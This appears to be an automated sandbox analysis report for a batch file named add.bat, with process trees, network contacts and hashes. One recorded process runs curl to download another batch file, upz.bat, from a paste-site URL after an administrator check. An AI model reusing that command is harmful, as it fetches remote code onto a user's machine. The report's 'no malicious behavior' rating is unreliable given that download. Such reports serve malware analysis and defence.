Analysis Overview
SHA256
c8badf0124a182162b24435e0d435bee500017573cb5e75ef6cc5f418f91cf4b
Threat Level: No (potentially) malicious behavior was detected
The file add.bat was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
Delays execution with timeout.exe
Runs net.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-04 21:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 21:39
Reported
2024-11-04 21:40
Platform
win7-20240903-en
Max time kernel
51s
Max time network
17s
Command Line
Signatures
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Runs net.exe
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2236 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 2236 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 2236 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 2364 wrote to memory of 2776 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 2364 wrote to memory of 2776 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 2364 wrote to memory of 2776 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 2236 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe |
| PID 2236 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe |
| PID 2236 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\add.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\timeout.exe
timeout /t 4
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-04 21:39
Reported
2024-11-04 21:40
Platform
win10v2004-20241007-en
Max time kernel
16s
Max time network
18s
Command Line
Signatures
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Runs net.exe
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2480 wrote to memory of 4416 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 2480 wrote to memory of 4416 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 4416 wrote to memory of 1564 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 4416 wrote to memory of 1564 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 2480 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe |
| PID 2480 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe |
| PID 2480 wrote to memory of 1164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 2480 wrote to memory of 1164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\add.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\timeout.exe
timeout /t 4
C:\Windows\system32\curl.exe
curl -s -o upz.bat https://rentry.co/bvkohnim/raw
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 40.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\bins\upz.bat
| MD5 | 9068e2de4ddd34f42b793c7da0658e90 |
| SHA1 | 5cfebfdec1a285c2a6e33c9371aba378edac1c0e |
| SHA256 | 8fc6a68f2044da3a872ddaef933b2c97d84d547b93b6f677ad42c3cd236ae46d |
| SHA512 | cd2648b983e6f792c87692d0a483d9fd7dd1233a0ad012eb1ccd7ee1d097d1062927b2d82c45e3466178d2e9030b55399e5faff7f1ca1097f78862e95089bcb4 |